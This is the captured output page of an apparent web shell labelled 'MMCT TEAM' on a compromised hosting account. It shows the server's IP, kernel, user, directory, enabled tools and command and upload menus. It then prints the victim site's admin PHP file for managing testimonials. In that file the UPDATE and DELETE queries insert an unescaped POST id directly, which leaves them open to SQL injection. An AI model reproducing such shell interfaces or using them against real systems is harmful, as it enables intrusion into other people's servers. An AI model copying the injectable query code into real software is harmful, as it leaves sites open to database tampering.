MMCT TEAM
Server IP : 162.214.80.37  /  Your IP : 216.73.216.83
Web Server : Apache
System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : imyrqtmy ( 2189)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home2/imyrqtmy/public_html/medicpartner/admin/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/imyrqtmy/public_html/medicpartner/admin/add_testimonials.php
<?php

include("includes/config.php");

if(isset($_POST['add_testimonials'])){
    $name = $_POST['name'];
    $position = $_POST['position'];
    $content = $_POST['content'];

    // Sanitize input data (for example, you can use mysqli_real_escape_string)
    $name = mysqli_real_escape_string($conn, $name);
    $position = mysqli_real_escape_string($conn, $position);
    $content = mysqli_real_escape_string($conn, $content);
 
    // Construct the SQL query with sanitized input data
    $query = "INSERT INTO `testimonials` (`name`, `position`, `content`) VALUES ('$name', '$position', '$content')";
    $query_run = mysqli_query($conn, $query);

    if($query_run){
        $_SESSION['status'] = "Data Uploaded Successfully";
        header('Location: view-testimonials.php');
        exit;
    } else {
        $_SESSION['status'] = "Data Not Uploaded Successfully";
        header('Location: testimonials.php');
        exit;
    }
}


// update 
if(isset($_POST['update_testimonials'])){
    $id = $_POST['id'];
    $name = $_POST['name'];
    $position = $_POST['position'];
    $content = $_POST['content'];

    // Sanitize input data (for example, you can use mysqli_real_escape_string)
    $name = mysqli_real_escape_string($conn, $name);
    $position = mysqli_real_escape_string($conn, $position);
    $content = mysqli_real_escape_string($conn, $content);

    // Update the testimonial information in the database
    $query = "UPDATE testimonials SET name='$name', position='$position', content='$content' WHERE id ='$id' ";

    $query_run = mysqli_query($conn, $query);

    if($query_run){
        $_SESSION['status'] = "Testimonial Updated Successfully";
        header('Location: view-testimonials.php');
    } else {
        $_SESSION['status'] = "Testimonial Not Updated Successfully";
        header('Location: view-testimonials.php');
    }
}


// delete

if(isset($_POST['delete_testimonials'])){
    $id = $_POST['delete_id'];

    $query = "DELETE FROM testimonials WHERE id = '$id'";
    $query_run = mysqli_query($conn, $query);

    if($query_run){
        $_SESSION['status'] = "Testimonial Deleted Successfully";
        header('Location: view-testimonials.php');
    } else {
        $_SESSION['status'] = "Testimonial Not Deleted Successfully";
        header('Location: view-testimonials.php');
    }
}
?>

MMCT - 2023